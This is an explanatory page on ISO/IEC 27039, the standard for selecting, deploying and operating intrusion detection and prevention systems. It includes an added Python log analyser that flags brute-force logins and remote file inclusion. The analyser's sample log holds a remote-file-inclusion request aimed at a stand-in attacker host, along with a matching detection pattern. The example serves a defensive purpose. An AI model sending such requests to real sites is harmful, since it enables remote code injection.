ISO 27039


ISO 27039 details the selection, deployment and operations of intrusion detection and prevention systems (IDPS). We’re going to explore what that means.

What is ISO 27039?

ISO/IEC 27039:2015 provides recommendations to assist organisations in implementing intrusion detection and prevention systems (IDPS). ISO 27039 outlines IDPS selection, deployment and operational processes, and also offers background information for these guidelines. Intrusion detection and intrusion prevention are two broad terms for practices used to stop attacks and avoid new threats.

Intrusion detection is a reactive measure: an intrusion detection system identifies ongoing threats so they can be mitigated. It is used to:

  • Detect malware (e.g. Trojans, backdoors, rootkits)
  • Detect social engineering attacks that manipulate users into exposing confidential details (e.g. phishing)

Intrusion prevention is a proactive security measure that uses an intrusion prevention system to block attacks against devices. That includes:

  • Remote file inclusion enabling malware injection,
  • SQL injection used to navigate company databases.

A well-designed, implemented, configured, controlled and operated IDPS offers benefits such as:

  • Automation relieves security professionals who would otherwise have to track, evaluate and react as best they can to network security incidents;
  • Automation tends to expedite the identification of and reaction to attacks, especially common types of attack that can be unambiguously identified via unique signatures;
  • It reassures management that security problems on networks and networked devices are detected and mitigated.

The standard provides guidance and instructions on the implementation of an IDPS.


What are intrusion detection and prevention systems?

Organisations shouldn’t just know what, where and how their network, device or programme was intruded. They should also know which vulnerability was abused and what precautions or risk treatments to implement to avoid future issues.

Organisations can also identify and prevent cyber intrusions. This method involves examining network traffic and audit trails for known attacks or unusual patterns that generally imply malicious intent. In the mid-1990s, companies started using intrusion detection and prevention systems (IDPS) to meet these needs.

The general use of IDPS continues to grow, with a wider variety of IDPS devices being made available to meet a growing level of organisational requirements for sophisticated intrusion detection.

Intrusion Detection Systems are mostly automated systems that identify hackers’ attacks and intrusions into a network or device and raise the alarm. Intrusion Prevention Systems take automation a stage further by automatically reacting to certain methods of identified attack, such as closing specific network ports via a firewall to block identified hacker traffic. IDPS refers to both types of system.

An Intrusion Detection System (IDS) is a hardware or software programme that uses known intrusion signatures to identify and analyse inbound and outbound network traffic for suspicious activity. An IDS achieves this by:

  • Comparing system files to malware signatures.
  • Scanning processes to identify dangerous patterns.
  • Tracking user actions for malicious intent.
  • Monitoring device configurations and parameters.

Upon detecting a security breach, virus or configuration error, an IDS will kick an offending user off the network and send a warning to security personnel.

Despite its advantages, an IDS has inherent disadvantages. Since it uses established intrusion signatures to find attacks, newly discovered or zero-day threats may remain undetected. An IDS detects only active attacks, not incoming assaults. An intrusion prevention system is needed to block these.

An Intrusion Prevention System (IPS) complements an IDS setup by proactively reviewing incoming traffic to avoid malicious requests. A standard IPS setup uses firewalls and traffic filtering solutions to protect applications.

An IPS avoids attacks by dropping malicious packets, blocking infringing IPs, and alerting security staff to risks. This device typically uses a pre-existing signature recognition database and can be designed to detect traffic-based attacks and behaviour irregularities.

Although they effectively block known attack vectors, some IPS systems have limitations. These are usually caused by over-reliance on pre-defined rules, making them prone to false positives.

The history of ISO/IEC 27039:2015

ISO released this standard in 2015. ISO 27039 was published as a replacement for ISO/IEC 18043:2006. In 2016, the technical corrigendum revised the description of the standard, reinstating the notably missing words “and prevention”.

ISO/IEC 18043:2006

ISO/IEC 18043:2006 issued guidelines for an enterprise that chooses to provide intrusion detection in its IT infrastructure. It was a ‘how to’ for administrators and users who wanted:

  • To understand the costs and benefits of an IDS
  • To establish a policy and implementation plan for the IDS
  • To efficiently control the outputs of the IDS
  • To incorporate the monitoring of intrusions into the safety procedures of the organisation
  • To consider the legal and privacy concerns involved in the introduction of the IDS

ISO/IEC 18043:2006 provided information that helped promote cooperation between organisations using the IDS. The structure made it easier for organisations to share information on intrusions that cross organisational boundaries.

The ISO/IEC 18043:2006 standard provided:

  • A brief description of the intrusion detection process
  • An explanation of what an IDS can and cannot do
  • A checklist that helped to determine the best IDS features for a particular IT environment
  • A definition of different deployment strategies
  • Advice on managing IDS alerts
  • An explanation for management and legal concerns


What are the benefits of ISO 27039?

Both systems have benefits and drawbacks. ISO 27039 contains specific information and guidance for the successful implementation and application of IDPSs for all organisations.

Fewer security incidents

Although connected systems typically do not notice any change, an IPS means less disruption to the organisation’s systems and fewer security incidents.

Logging selectively and protecting privacy

An IPS only tracks network behaviour as it takes action, protecting network users’ privacy. It correlates network traffic with known malicious traffic but does not store or access the content.

Reputable managed security

The IPS uses a reputation-based list of suspected malicious sites and domains to proactively secure the company. For example, if a member of staff clicks a link in a phishing email or a malicious ad for a site on the IPS denylist of identified malicious sites, the system will block the traffic and the employee would see a blank screen.

Multi-threat security

An IPS offers zero-day attack protection, reduces brute force password attacks, and offers protection against risks to availability, such as DDoS and DoS attempts. For example, suppose a criminal tries to gain access to an account by brute force (e.g. repeated login attempts). The IPS will track the scale of data movements, identify suspicious patterns and deny access.

Dynamic threat response

An IPS identifies and reacts to specific threats, enabling institutions to respond to defined threats to the company.

Implementing an IDS, however, has its own benefits. These include:

  • Using the signature database, an IDS ensures swift and efficient identification of known anomalies with a low chance of false alarms.
  • It analyses various types of threats, detects trends in malicious content and helps administrators select, manage and enforce adequate controls.
  • It helps ensure regulatory compliance and adherence to security regulations, as it offers greater visibility across the entire network.
  • While an IDS is usually a passive device that detects and generates warnings, some active IDS can block IP addresses or prevent access to resources when an anomaly is detected.
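The brute force example above and the signature database described in the IDS list can be shown together in a small analyser. This is an added illustration, not code from ISO 27039 or from ISMS.online: the log format, the IP addresses, the threshold and window values and the single remote file inclusion signature are all constructed assumptions.

```python
"""Added example: minimal IDPS-style analyser combining signature matching
(known-bad patterns) with a behaviour rule (repeated failed logins in a
sliding window), run over constructed log lines. Not from the page."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (syslog-like; addresses are documentation ranges)
SAMPLE_LOG = """\
2024-01-01T10:00:01 sshd: Failed password for root from 203.0.113.5
2024-01-01T10:00:02 sshd: Failed password for root from 203.0.113.5
2024-01-01T10:00:03 sshd: Failed password for root from 203.0.113.5
2024-01-01T10:00:04 sshd: Failed password for root from 203.0.113.5
2024-01-01T10:00:05 sshd: Failed password for root from 203.0.113.5
2024-01-01T10:00:06 sshd: Failed password for root from 203.0.113.5
2024-01-01T10:00:07 sshd: Accepted password for alice from 198.51.100.7
2024-01-01T10:05:00 sshd: Failed password for bob from 198.51.100.8
2024-01-01T10:09:00 sshd: Failed password for bob from 198.51.100.8
2024-01-01T10:10:00 httpd: GET /index.php?page=http://evil.example/x.txt from 192.0.2.9
"""

# Signature rules: an assumed stand-in for the IDS signature database
SIGNATURES = {
    "remote_file_inclusion": re.compile(r"GET \S*\?\S*=https?://"),
}
LINE_RE = re.compile(r"^(\S+) (\S+): (.*) from (\d+\.\d+\.\d+\.\d+)$")
FAIL_RE = re.compile(r"Failed password")

def analyse(log, threshold=5, window_s=60):
    """Return (alerts, blocked): alerts as (type, ip) tuples in order raised,
    blocked as the set of IPs an IPS would drop traffic from."""
    alerts, blocked = [], set()
    failures = defaultdict(list)  # ip -> timestamps of recent failed logins
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ts_raw, _proc, msg, ip = m.groups()
        ts = datetime.fromisoformat(ts_raw)
        for name, pat in SIGNATURES.items():  # signature-based detection
            if pat.search(msg):
                alerts.append((name, ip))
                blocked.add(ip)
        if FAIL_RE.search(msg):  # behaviour-based detection
            recent = [t for t in failures[ip] if ts - t <= timedelta(seconds=window_s)]
            failures[ip] = recent + [ts]
            # threshold and window decide the false-positive rate: bob's two
            # failures four minutes apart stay below it and are not flagged
            if len(failures[ip]) >= threshold and ip not in blocked:
                alerts.append(("brute_force", ip))
                blocked.add(ip)
    return alerts, blocked
```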

Who can implement ISO 27039?

The ISO 27039 Standard helps organisations:

Trying to meet ISO 27001 requirements, specifically Annex A.16:

  • The organisation shall implement procedures and other measures capable of prompt identification of and response to security incidents
  • To better detect attempted and successful security breaches and incidents, the organisation shall conduct monitoring and evaluation procedures and other controls

Trying to meet the following security objectives of ISO 27002

However, an organisation should understand that implementing an IDPS is not a single or complete approach to satisfying these requirements. Moreover, this International Standard is not intended as a guideline for any compliance evaluation, such as ISMS certification.


ISO/IEC 27039:2015 Clauses

Clause 1: Scope

Clause 2: Terms and definitions

Clause 3: Background

Clause 4: General

Clause 5: Selection

  • 5.1 Introduction
  • 5.2 Information security risk assessment
  • 5.3 Host or Network IDPS
  • 5.4 Considerations
  • 5.5 Tools that complement IDPS
  • 5.6 Scalability
  • 5.7 Technical support
  • 5.8 Training

Clause 6: Deployment

  • 6.1 Overview
  • 6.2 Staged deployment
  • 6.3 NIDPS deployment
  • 6.4 HIDPS deployment
  • 6.5 Safeguarding and protecting IDPS information security

Clause 7: Operations

  • 7.1 Overview
  • 7.2 IDPS tuning
  • 7.3 IDPS vulnerabilities
  • 7.4 Handling IDPS alerts
  • 7.5 Response options
  • 7.6 Legal considerations

ISO/IEC 27039:2015 requirements

ISO 27039 has seven clauses and one Annex.

Three main parts form the standard’s bulk:

  • Clause 5: IDPS selection: the different forms of IDPS, complementary resources etc. to be considered (detailed further in the Annex)
  • Clause 6: IDPS deployment
  • Clause 7: IDPS operations

ISO/IEC 27039:2015 Annex A Clauses

Annex A: Intrusion Detection and Prevention System (IDPS): Framework and issues to be considered

  • A.1 Introduction to intrusion detection
  • A.2 Types of intrusions and attacks
  • A.3 Generic model of the intrusion detection process
  • A.4 Types of IDPS
  • A.5 Architecture
  • A.6 Management of an IDPS
